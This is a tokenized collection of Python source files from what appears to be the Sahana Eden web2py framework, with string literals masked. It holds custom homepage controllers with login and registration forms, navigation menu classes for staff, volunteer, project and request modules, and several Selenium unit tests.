= "<STR_LIT>" <EOL> output [ "<STR_LIT>" ] = item <EOL> self_registration = settings . get_security_registration_visible ( ) <EOL> registered = False <EOL> login_form = None <EOL> login_div = None <EOL> register_form = None <EOL> register_div = None <EOL> if system_roles . AUTHENTICATED not in roles : <EOL> login_buttons = DIV ( A ( T ( "<STR_LIT>" ) , <EOL> _id = "<STR_LIT>" , <EOL> _class = "<STR_LIT>" ) , <EOL> _id = "<STR_LIT>" <EOL> ) <EOL> script = '''<STR_LIT>''' <EOL> s3 . jquery_ready . append ( script ) <EOL> if current . request . cookies . has_key ( "<STR_LIT>" ) : <EOL> registered = True <EOL> if self_registration is True : <EOL> login_buttons . append ( A ( T ( "<STR_LIT>" ) , <EOL> _id = "<STR_LIT>" , <EOL> _class = "<STR_LIT>" , <EOL> _style = "<STR_LIT>" ) ) <EOL> script = '''<STR_LIT>''' <EOL> s3 . jquery_ready . append ( script ) <EOL> register_form = auth . register ( ) <EOL> register_div = DIV ( H3 ( T ( "<STR_LIT>" ) ) , <EOL> P ( XML ( T ( "<STR_LIT>" ) % dict ( sign_up_now = B ( T ( "<STR_LIT>" ) ) ) ) ) ) <EOL> register_script = '''<STR_LIT>''' <EOL> s3 . jquery_ready . append ( register_script ) <EOL> auth . messages . submit_button = T ( "<STR_LIT>" ) <EOL> login_form = auth . login ( inline = True ) <EOL> login_div = DIV ( H3 ( T ( "<STR_LIT>" ) ) , <EOL> P ( XML ( T ( "<STR_LIT>" ) % dict ( login = B ( T ( "<STR_LIT>" ) ) ) ) ) ) <EOL> else : <EOL> login_buttons = "<STR_LIT>" <EOL> output [ "<STR_LIT>" ] = login_buttons <EOL> output [ "<STR_LIT>" ] = self_registration <EOL> output [ "<STR_LIT>" ] = registered <EOL> output [ "<STR_LIT>" ] = login_div <EOL> output [ "<STR_LIT>" ] = login_form <EOL> output [ "<STR_LIT>" ] = register_div <EOL> output [ "<STR_LIT>" ] = register_form <EOL> self . _view ( TEMPLATE , "<STR_LIT>" ) <EOL> return output </s>
<s> from gluon import * <EOL> from s3 import S3CustomController <EOL> THEME = "<STR_LIT>" <EOL> class index ( S3CustomController ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self ) : <EOL> response = current . response <EOL> output = { } <EOL> s3 = response . s3 <EOL> s3 . stylesheets . append ( "<STR_LIT>" ) <EOL> self . _view ( THEME , "<STR_LIT>" ) <EOL> return output <EOL> def latest_records ( resource , layout , list_id , limit , list_fields , orderby ) : <EOL> """<STR_LIT>""" <EOL> datalist , numrows , ids = resource . datalist ( fields = list_fields , <EOL> start = None , <EOL> limit = limit , <EOL> list_id = list_id , <EOL> orderby = orderby , <EOL> layout = layout ) <EOL> if numrows == <NUM_LIT:0> : <EOL> from s3 . s3crud import S3CRUD <EOL> table = resource . table <EOL> if "<STR_LIT>" in table : <EOL> available_records = current . db ( table . deleted != True ) <EOL> else : <EOL> available_records = current . db ( table . _id > <NUM_LIT:0> ) <EOL> if available_records . select ( table . _id , <EOL> limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) : <EOL> msg = DIV ( S3CRUD . crud_string ( resource . tablename , <EOL> "<STR_LIT>" ) , <EOL> _class = "<STR_LIT>" ) <EOL> else : <EOL> msg = DIV ( S3CRUD . crud_string ( resource . tablename , <EOL> "<STR_LIT>" ) , <EOL> _class = "<STR_LIT>" ) <EOL> data = msg <EOL> else : <EOL> dl = datalist . html ( ) <EOL> data = dl <EOL> return data </s>
<s> from os import path <EOL> from gluon import * <EOL> from s3 import S3CustomController <EOL> THEME = "<STR_LIT>" <EOL> class index ( S3CustomController ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self ) : <EOL> output = { } <EOL> if current . deployment_settings . has_module ( "<STR_LIT>" ) : <EOL> system_roles = current . auth . get_system_roles ( ) <EOL> ADMIN = system_roles . ADMIN in current . session . s3 . roles <EOL> s3db = current . s3db <EOL> table = s3db . cms_post <EOL> ltable = s3db . cms_post_module <EOL> module = "<STR_LIT:default>" <EOL> resource = "<STR_LIT:index>" <EOL> query = ( ltable . module == module ) & ( ( ltable . resource == None ) | ( ltable . resource == resource ) ) & ( ltable . post_id == table . id ) & ( table . deleted != True ) <EOL> item = current . db ( query ) . select ( table . body , <EOL> table . id , <EOL> limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) <EOL> if item : <EOL> if ADMIN : <EOL> item = DIV ( XML ( item . body ) , <EOL> BR ( ) , <EOL> A ( current . T ( "<STR_LIT>" ) , <EOL> _href = URL ( c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> args = [ item . id , "<STR_LIT>" ] ) , <EOL> _class = "<STR_LIT>" ) ) <EOL> else : <EOL> item = DIV ( XML ( item . body ) ) <EOL> elif ADMIN : <EOL> if current . response . s3 . crud . formstyle == "<STR_LIT>" : <EOL> _class = "<STR_LIT>" <EOL> else : <EOL> _class = "<STR_LIT>" <EOL> item = A ( current . T ( "<STR_LIT>" ) , <EOL> _href = URL ( c = "<STR_LIT>" , f = "<STR_LIT>" , args = "<STR_LIT>" , <EOL> vars = { "<STR_LIT>" : module , <EOL> "<STR_LIT>" : resource <EOL> } ) , <EOL> _class = "<STR_LIT>" % _class ) <EOL> else : <EOL> item = "<STR_LIT>" <EOL> else : <EOL> item = "<STR_LIT>" <EOL> output [ "<STR_LIT>" ] = item <EOL> self . _view ( THEME , "<STR_LIT>" ) <EOL> return output <EOL> def deploy_index ( ) : <EOL> """<STR_LIT>""" <EOL> response = current . response <EOL> def prep ( r ) : <EOL> default_url = URL ( f = "<STR_LIT>" , args = "<STR_LIT>" , vars = { } ) <EOL> return current . s3db . cms_documentation ( r , "<STR_LIT>" , default_url ) <EOL> response . s3 . prep = prep <EOL> output = current . rest_controller ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> view = path . join ( current . request . folder , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> THEME , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> try : <EOL> response . view = open ( view , "<STR_LIT:rb>" ) <EOL> except IOError : <EOL> from gluon . http import HTTP <EOL> raise HTTP ( <NUM_LIT> , "<STR_LIT>" % view ) <EOL> return output </s>
<s> from gluon import current <EOL> from s3 import * <EOL> from s3layouts import * <EOL> try : <EOL> from . layouts import * <EOL> except ImportError : <EOL> pass <EOL> import s3menus as default <EOL> class S3MainMenu ( default . S3MainMenu ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def menu ( cls ) : <EOL> """<STR_LIT>""" <EOL> main_menu = MM ( ) ( <EOL> cls . menu_modules ( ) , <EOL> ) <EOL> current . menu . personal = cls . menu_personal ( ) <EOL> current . menu . lang = cls . menu_lang ( ) <EOL> current . menu . about = cls . menu_about ( ) <EOL> current . menu . org = cls . menu_org ( ) <EOL> return main_menu <EOL> @ classmethod <EOL> def menu_modules ( cls ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> homepage ( "<STR_LIT>" ) ( <EOL> ) , <EOL> homepage ( "<STR_LIT>" , name = "<STR_LIT>" ) ( <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> ) , <EOL> homepage ( "<STR_LIT>" ) ( <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> homepage ( "<STR_LIT>" ) ( <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> homepage ( "<STR_LIT>" ) ( <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> homepage ( "<STR_LIT>" ) ( <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> ) , <EOL> homepage ( "<STR_LIT>" , name = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> vars = { "<STR_LIT>" : "<STR_LIT:2>" } ) ( <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> ] <EOL> @ classmethod <EOL> def menu_org ( cls ) : <EOL> """<STR_LIT>""" <EOL> OM = S3OrgMenuLayout <EOL> return OM ( ) <EOL> @ classmethod <EOL> def menu_lang ( cls ) : <EOL> s3 = current . response . s3 <EOL> menu_lang = ML ( "<STR_LIT>" , right = True ) <EOL> for language in s3 . l10n_languages . items ( ) : <EOL> code , name = language <EOL> menu_lang ( <EOL> ML ( name , translate = False , lang_code = code , lang_name = name ) <EOL> ) <EOL> return menu_lang <EOL> @ classmethod <EOL> def menu_personal ( cls ) : <EOL> """<STR_LIT>""" <EOL> auth = current . auth <EOL> s3 = current . response . s3 <EOL> settings = current . deployment_settings <EOL> if not auth . is_logged_in ( ) : <EOL> request = current . request <EOL> login_next = URL ( args = request . args , vars = request . vars ) <EOL> if request . controller == "<STR_LIT:default>" and request . function == "<STR_LIT:user>" and "<STR_LIT>" in request . get_vars : <EOL> login_next = request . get_vars [ "<STR_LIT>" ] <EOL> self_registration = settings . get_security_self_registration ( ) <EOL> menu_personal = MP ( ) ( <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT:default>" , f = "<STR_LIT:user>" , <EOL> m = "<STR_LIT>" , check = self_registration ) , <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT:default>" , f = "<STR_LIT:user>" , <EOL> m = "<STR_LIT>" , vars = dict ( _next = login_next ) ) , <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT:default>" , f = "<STR_LIT:user>" , <EOL> m = "<STR_LIT>" ) , <EOL> ) <EOL> else : <EOL> s3_has_role = auth . s3_has_role <EOL> is_org_admin = lambda i : s3_has_role ( "<STR_LIT>" ) and not s3_has_role ( "<STR_LIT>" ) <EOL> menu_personal = MP ( ) ( <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT:index>" , <EOL> check = s3_has_role ( "<STR_LIT>" ) ) , <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT:user>" , <EOL> check = is_org_admin ) , <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT:default>" , f = "<STR_LIT>" ) , <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT:default>" , f = "<STR_LIT:user>" , <EOL> m = "<STR_LIT>" ) , <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT:default>" , f = "<STR_LIT:user>" , <EOL> m = "<STR_LIT>" ) , <EOL> ) <EOL> return menu_personal <EOL> @ classmethod <EOL> def menu_about ( cls ) : <EOL> menu_about = MA ( c = "<STR_LIT:default>" ) ( <EOL> MA ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MA ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MA ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MA ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> ) <EOL> return menu_about <EOL> class S3OptionsMenu ( default . S3OptionsMenu ) : <EOL> """<STR_LIT>""" <EOL> def admin ( self ) : <EOL> """<STR_LIT>""" <EOL> menu = super ( S3OptionsMenu , self ) . admin ( ) <EOL> menu ( M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT:index>" ) , <EOL> ) <EOL> return menu <EOL> def gis ( self ) : <EOL> """<STR_LIT>""" <EOL> if current . request . function == "<STR_LIT:index>" : <EOL> return None <EOL> else : <EOL> return super ( S3OptionsMenu , self ) . gis ( ) <EOL> @ staticmethod <EOL> def hrm ( ) : <EOL> """<STR_LIT>""" <EOL> has_role = current . auth . s3_has_role <EOL> s3 = current . session . s3 <EOL> ADMIN = s3 . system_roles . ADMIN <EOL> settings = current . deployment_settings <EOL> if "<STR_LIT>" not in s3 : <EOL> current . s3db . hrm_vars ( ) <EOL> hrm_vars = s3 . hrm <EOL> SECTORS = "<STR_LIT>" if settings . get_ui_label_cluster ( ) else "<STR_LIT>" <EOL> manager_mode = lambda i : hrm_vars . mode is None <EOL> personal_mode = lambda i : hrm_vars . mode is not None <EOL> is_org_admin = lambda i : hrm_vars . orgs and True or has_role ( ADMIN ) <EOL> is_super_editor = lambda i : has_role ( "<STR_LIT>" ) or has_role ( "<STR_LIT>" ) <EOL> staff = { "<STR_LIT>" : "<STR_LIT>" } <EOL> use_certs = lambda i : settings . get_hrm_use_certificates ( ) <EOL> return M ( ) ( <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = ( "<STR_LIT>" , "<STR_LIT>" ) , m = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> vars = staff , p = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , <EOL> c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> check = [ manager_mode , is_super_editor ] ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , <EOL> f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , <EOL> ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , p = "<STR_LIT>" , check = is_org_admin ) <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , p = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , p = "<STR_LIT>" , check = is_org_admin ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , <EOL> vars = dict ( expiring = "<STR_LIT:1>" ) ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , p = "<STR_LIT>" , check = is_org_admin ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = [ manager_mode , use_certs ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , p = "<STR_LIT>" , check = is_org_admin ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> restrict = [ ADMIN ] , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> restrict = [ ADMIN ] , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT:index>" , <EOL> check = [ personal_mode , is_org_admin ] ) , <EOL> ) <EOL> def org ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . hrm ( ) <EOL> @ staticmethod <EOL> def project ( ) : <EOL> """<STR_LIT>""" <EOL> return M ( c = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , vars = { "<STR_LIT>" : <NUM_LIT:1> } ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT:time>" ) ( <EOL> M ( "<STR_LIT>" , vars = { "<STR_LIT>" : <NUM_LIT:1> } ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , vars = { "<STR_LIT>" : <NUM_LIT:1> } ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT:time>" , m = "<STR_LIT>" , <EOL> vars = Storage ( rows = "<STR_LIT>" , <EOL> cols = "<STR_LIT>" , <EOL> fact = "<STR_LIT>" , <EOL> week = <NUM_LIT:1> ) ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT:time>" , m = "<STR_LIT>" , <EOL> vars = Storage ( rows = "<STR_LIT>" , <EOL> cols = "<STR_LIT>" , <EOL> fact = "<STR_LIT>" , <EOL> month = <NUM_LIT:1> ) ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT:time>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> ) <EOL> @ staticmethod <EOL> def req ( ) : <EOL> """<STR_LIT>""" <EOL> return M ( c = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , vars = { "<STR_LIT:type>" : <NUM_LIT:3> } ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> ) ( ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , t = "<STR_LIT>" ) , <EOL> ) , <EOL> ) <EOL> @ staticmethod <EOL> def vol ( ) : <EOL> """<STR_LIT>""" <EOL> auth = current . auth <EOL> has_role = auth . s3_has_role <EOL> s3 = current . session . s3 <EOL> ADMIN = s3 . system_roles . ADMIN <EOL> root_org = auth . root_org_name ( ) <EOL> manager_mode = lambda i : s3 . hrm . mode is None <EOL> personal_mode = lambda i : s3 . hrm . mode is not None <EOL> is_org_admin = lambda i : s3 . hrm . orgs and True or has_role ( ADMIN ) <EOL> is_super_editor = lambda i : has_role ( "<STR_LIT>" ) or has_role ( "<STR_LIT>" ) <EOL> settings = current . deployment_settings <EOL> use_certs = lambda i : settings . get_hrm_use_certificates ( ) <EOL> show_programmes = lambda i : settings . get_hrm_vol_experience ( ) == "<STR_LIT>" <EOL> show_tasks = lambda i : settings . has_module ( "<STR_LIT>" ) and settings . get_project_mode_task ( ) <EOL> teams = settings . get_hrm_teams ( ) <EOL> use_teams = lambda i : teams <EOL> return M ( c = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> check = [ manager_mode ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> vars = { "<STR_LIT>" : "<STR_LIT>" } , p = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , <EOL> c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> check = [ manager_mode , is_super_editor ] ) , <EOL> M ( teams , f = "<STR_LIT>" , <EOL> check = [ manager_mode , use_teams ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = [ manager_mode ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , p = "<STR_LIT>" , check = is_org_admin ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = [ manager_mode , use_certs ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = [ manager_mode , show_programmes ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = [ manager_mode , is_org_admin ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> vars = Storage ( rows = "<STR_LIT>" , <EOL> cols = "<STR_LIT>" , <EOL> fact = "<STR_LIT>" ) , <EOL> check = show_programmes ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> vars = Storage ( rows = "<STR_LIT>" , <EOL> cols = "<STR_LIT>" , <EOL> fact = "<STR_LIT>" ) , <EOL> check = show_programmes ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = [ personal_mode , show_tasks ] , <EOL> vars = dict ( access = "<STR_LIT>" , <EOL> mine = <NUM_LIT:1> ) ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT:index>" , <EOL> check = [ personal_mode , is_org_admin ] ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> from tests . web2unittest import SeleniumUnitTest <EOL> class CreateAsset ( SeleniumUnitTest ) : <EOL> def test_asset001_create_asset ( self ) : <EOL> """<STR_LIT>""" <EOL> today = self . today ( ) <EOL> now = self . now ( ) <EOL> now_1_day = self . now_1_day ( ) <EOL> now_1_week = self . now_1_week ( ) <EOL> self . login ( account = "<STR_LIT>" , nexturl = "<STR_LIT>" ) <EOL> self . create ( "<STR_LIT>" , <EOL> [ ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> today ) , <EOL> ( "<STR_LIT>" , <EOL> <NUM_LIT:8> ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) ] <EOL> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> self . browser . find_element_by_link_text ( "<STR_LIT>" ) . click ( ) <EOL> self . create ( "<STR_LIT>" , <EOL> [ <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) ] <EOL> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> self . browser . find_element_by_link_text ( "<STR_LIT>" ) . click ( ) <EOL> self . create ( "<STR_LIT>" , <EOL> [ <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) ] <EOL> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> self . browser . find_element_by_link_text ( "<STR_LIT>" ) . click ( ) <EOL> self . create ( "<STR_LIT>" , <EOL> [ ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from gluon import current <EOL> from tests . web2unittest import SeleniumUnitTest <EOL> class CreateOrganisation ( SeleniumUnitTest ) : <EOL> def test_org001_create_organisation ( self , items = [ <NUM_LIT:0> ] ) : <EOL> """<STR_LIT>""" <EOL> settings = current . deployment_settings <EOL> tablename = "<STR_LIT>" <EOL> url = "<STR_LIT>" <EOL> account = "<STR_LIT>" <EOL> data = [ <EOL> [ <EOL> ( "<STR_LIT:name>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] , <EOL> ] <EOL> if settings . get_org_regions ( ) : <EOL> data [ <NUM_LIT:0> ] . append ( ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> db = current . db <EOL> s3db = current . s3db <EOL> table = s3db [ tablename ] <EOL> for item in items : <EOL> _data = data [ item ] <EOL> fieldname = _data [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> value = _data [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> query = ( table [ fieldname ] == value ) & ( table . deleted == "<STR_LIT:F>" ) <EOL> record = db ( query ) . select ( table . id , <EOL> limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) <EOL> if record : <EOL> debug = "<STR_LIT>" % value <EOL> print debug <EOL> self . s3_debug ( debug ) <EOL> return False <EOL> self . login ( account = account , nexturl = url ) <EOL> result = self . create ( tablename , _data ) </s>
<s> """<STR_LIT>""" <EOL> from tests . web2unittest import SeleniumUnitTest <EOL> class ExportStaff ( SeleniumUnitTest ) : <EOL> def test_export_staff ( self ) : <EOL> print "<STR_LIT:\n>" <EOL> self . login ( account = "<STR_LIT>" , nexturl = "<STR_LIT>" ) <EOL> browser = self . browser <EOL> browser . find_element_by_xpath ( "<STR_LIT>" ) . click ( ) </s>
